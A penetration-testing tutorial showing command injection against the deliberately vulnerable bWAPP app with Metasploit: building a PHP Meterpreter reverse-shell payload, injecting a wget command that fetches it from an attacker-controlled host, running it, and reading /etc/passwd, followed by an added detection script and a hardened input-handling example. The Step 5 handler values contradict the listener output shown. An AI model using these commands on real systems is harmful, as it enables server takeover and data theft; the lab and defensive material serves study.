Command injection: How to use Metasploit Penetration Testing Software to find security vulnerabilities (Metasploit with bWAPP)

Metasploit is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. (Wikipedia)
In this post we will use the Metasploit tool to exploit a command injection vulnerability in bWAPP. Our goal is to place a PHP shell on the application server, execute it, and obtain a reverse connection.

Step 1:- First we create a PHP shell with msfvenom (a combination of msfpayload and msfencode). Execute the following command in a terminal from the Metasploit installation's apps directory. It generates the file phpshell.php, the payload used in later steps.

sudo ./msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.213.142 LPORT=7654 -e php/base64 -f raw > /home/zytham/Desktop/phpshell.php

[zytham@s158519-vm app]$ ls
gem  msfbinscan  msfd        msfirb       msfpescan  msfrpcd    msfvenom
irb  msfconsole  msfelfscan  msfmachscan  msfrpc     msfupdate  ruby
[zytham@s158519-vm app]$ sudo ./msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.213.142 LPORT=7654 -e php/base64 -f raw > /home/zytham/Desktop/phpshell.php
[sudo] password for zytham:
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/base64
php/base64 succeeded with size 1291 (iteration=0)
php/base64 chosen with final size 1291
Payload size: 1291 bytes

Step 2:- Now edit the phpshell.php file and enclose its contents in PHP tags (<?php at the start, ?> at the end), as shown below.

Step 3:- Set up a web server and place phpshell.php where it will be served. A simple one can be started with the following command; execute it in the directory where phpshell.php was saved. (The session below uses port 8088, which is also the port referenced in Step 6.)

sudo python -m SimpleHTTPServer 80

[zytham@s158519-vm CIV]$ sudo python -m SimpleHTTPServer 8088
[sudo] password for zytham:
Serving HTTP on 0.0.0.0 port 8088 ...

Verify that the server is running and that the shell file is listed in its directory index.

Step 4:- Set up a Meterpreter listener on our machine (here the listener runs on the same IP that hosts phpshell.php). Execute the following command from the Metasploit installation's apps directory. On success we land in the Metasploit console.
[zytham@s158519-vm app]$ sudo ./msfconsole
[sudo] password for zytham:

       =[ metasploit v4.13.25-dev                         ]
+ -- --=[ 1625 exploits - 925 auxiliary - 282 post        ]
+ -- --=[ 472 payloads - 39 encoders - 9 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf >

Step 5:- Execute the following commands to set up the Meterpreter handler. LHOST and LPORT must be the same values that were baked into the payload in Step 1 (the handler output in Step 7 shows it listening on 192.168.213.142:7654), otherwise the shell will never connect back. The output of these commands is shown in the screenshot below.
msf > use exploit/multi/handler
msf exploit(handler) > set LHOST 192.168.213.141
msf exploit(handler) > set LPORT 1234
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > exploit

Step 6:- Download the locally created phpshell.php to the web application server by entering the following command in the command injection page's input field (the DNS lookup text box).
;wget http://192.168.213.142:8088/phpshell.php -O /tmp/phpshell.php;

The download can be verified by executing the following command in the same field (shown in the screenshot):
;ls -l /tmp/phpshell.php

Step 7:- Now execute the following command via the application (DNS lookup text box) to run the script placed in the previous step and make the reverse connection. On successful connection we obtain a Meterpreter session.

;/opt/lampp/bin/php -f /tmp/phpshell.php
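The two commands entered in Steps 6 and 7 leave a recognisable trace on the server: the web server's service account spawns a downloader that writes into /tmp and then an interpreter that runs a script from /tmp. The Python script below, added here as an example and not part of the original post, of bWAPP or of Metasploit, scans process-execution records for that pattern. The record format (timestamp, user=, cmd=) and the sample lines are constructed for illustration; the set of service-account names is an assumption to be tuned per deployment.

```python
"""Detect a web-server service account fetching a file into a world-writable
directory and then executing a script from it (the Step 6 / Step 7 pattern).
Added example: the record format and sample lines below are constructed."""
import re
import shlex

# Accounts a web server commonly runs as (assumption; tune per deployment).
WEB_SERVICE_USERS = {"daemon", "www-data", "apache", "nobody"}
DOWNLOADERS = {"wget", "curl"}
INTERPRETERS = {"php", "python", "perl", "sh", "bash"}
WORLD_WRITABLE = ("/tmp/", "/var/tmp/", "/dev/shm/")

# Constructed record format: "<timestamp> user=<account> cmd=<command line>"
RECORD_RE = re.compile(r"^(?P<ts>\S+)\s+user=(?P<user>\S+)\s+cmd=(?P<cmd>.+)$")


def parse_record(line):
    """Return a dict for one record, or None if the line does not match."""
    m = RECORD_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(event):
    """Return a finding for one parsed exec event, or None if it looks benign."""
    if event["user"] not in WEB_SERVICE_USERS:
        return None
    try:
        argv = shlex.split(event["cmd"])
    except ValueError:
        return f"unparseable command line from {event['user']}: {event['cmd']}"
    if not argv:
        return None
    prog = argv[0].rsplit("/", 1)[-1]   # basename, so /opt/lampp/bin/php -> php
    touches_tmp = any(arg.startswith(WORLD_WRITABLE) for arg in argv[1:])
    if prog in DOWNLOADERS and touches_tmp:
        return f"{event['user']} fetched a file into a world-writable directory: {event['cmd']}"
    if prog in INTERPRETERS and touches_tmp:
        return f"{event['user']} executed a script from a world-writable directory: {event['cmd']}"
    return None


def scan(lines):
    """Return (timestamp, finding) tuples for every suspicious record."""
    findings = []
    for line in lines:
        event = parse_record(line)
        if event is None:
            continue
        finding = classify(event)
        if finding:
            findings.append((event["ts"], finding))
    return findings


# Constructed sample records; the URL and /tmp path mirror Steps 6 and 7.
SAMPLE_RECORDS = [
    "2017-04-10T23:10:01 user=daemon cmd=nslookup www.example.com",
    "2017-04-10T23:15:22 user=daemon cmd=wget http://192.168.213.142:8088/phpshell.php -O /tmp/phpshell.php",
    "2017-04-10T23:16:05 user=daemon cmd=ls -l /tmp/phpshell.php",
    "2017-04-10T23:21:58 user=daemon cmd=/opt/lampp/bin/php -f /tmp/phpshell.php",
    "2017-04-10T23:30:00 user=zytham cmd=wget http://example.com/notes.txt -O /tmp/notes.txt",
]

if __name__ == "__main__":
    for ts, finding in scan(SAMPLE_RECORDS):
        print(ts, finding)
```

Run against the constructed records it reports two findings (the wget into /tmp and the php -f from /tmp) and ignores the benign nslookup, the ls, and the same wget run by an interactive user. In a real deployment the records would come from auditd execve events or a process-monitoring agent, and the parser would be adapted to that format.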

Below is the listener's terminal output when the Step 7 command is executed successfully in the UI (DNS lookup):
msf exploit(handler) > exploit

[*] Started reverse TCP handler on 192.168.213.142:7654
[*] Starting the payload handler...
[*] Sending stage (33986 bytes) to 192.168.213.142
[*] Meterpreter session 1 opened (192.168.213.142:7654 -> 192.168.213.142:49944) at 2017-04-10 23:21:59 +0530
meterpreter >
meterpreter > sysinfo
Computer    : s158519-vm.localvm.com
OS          : Linux s158519-vm.localvm.com 3.10.0-327.4.4.el7.x86_64 #1 SMP Tue Jan 5 16:07:00 UTC 2016 x86_64
Meterpreter : php/linux
meterpreter > pwd
/opt/lampp/htdocs/vulnerable-web
meterpreter > cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
...........................

From the above we can see that once the shell has been executed and the reverse connection established, arbitrary OS commands can be run on the application server.
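The DNS lookup page is exploitable because the submitted host name is concatenated into a shell command string, so a ';' in the input ends the nslookup command and starts another. The Python snippet below, added here as an illustration and not code from bWAPP or from the original post, contrasts that unsafe construction with a hardened version that validates the input as a host name and passes it to nslookup as a single argument without a shell. bWAPP itself is written in PHP; the pattern is the same. The function names and the injected sample input are constructed for this example (the sample mirrors the Step 6 payload).

```python
"""Unsafe vs hardened handling of a user-supplied DNS lookup target.
Added illustration; bWAPP itself is PHP, but the pattern is identical."""
import re
import subprocess

# One DNS label: 1-63 letters, digits or hyphens, no leading/trailing hyphen.
LABEL_RE = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


def is_valid_hostname(name):
    """Strict allow-list: only syntactically valid host names pass."""
    if not name or len(name) > 253:
        return False
    if name.endswith("."):            # accept a trailing dot (absolute name)
        name = name[:-1]
    return all(LABEL_RE.match(label) for label in name.split("."))


def unsafe_command(target):
    """The vulnerable pattern: user input concatenated into a shell string.
    Handed to a shell, everything after ';' runs as a separate command."""
    return "nslookup " + target


def safe_lookup(target, runner=subprocess.run):
    """Hardened version: allow-list validation plus argv execution without a shell.
    'runner' is injectable so the function can be exercised without network access."""
    if not is_valid_hostname(target):
        raise ValueError(f"rejected lookup target: {target!r}")
    # argv list + shell=False: the target reaches nslookup as exactly one
    # argument; ';', '|' and '$(...)' have no meaning because no shell parses it.
    return runner(["nslookup", target], shell=False, capture_output=True,
                  text=True, timeout=10)


# Constructed inputs: a normal name and the Step 6 payload.
NORMAL_INPUT = "www.example.com"
INJECTED_INPUT = "www.example.com;wget http://192.168.213.142:8088/phpshell.php -O /tmp/phpshell.php;"

if __name__ == "__main__":
    for value in (NORMAL_INPUT, INJECTED_INPUT):
        print("unsafe would hand the shell:", unsafe_command(value))
        try:
            argv = safe_lookup(value, runner=lambda argv, **kw: argv)
            print("safe would exec argv       :", argv)
        except ValueError as err:
            print("safe rejects               :", err)
```

Two layers are deliberate. Executing an argv list with shell=False already defeats the ';' trick on its own, because the whole string reaches nslookup as one argument; the allow-list validation additionally stops option injection (a target beginning with '-') and rejects malformed input before anything is executed, which keeps the error path simple to log and alert on.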
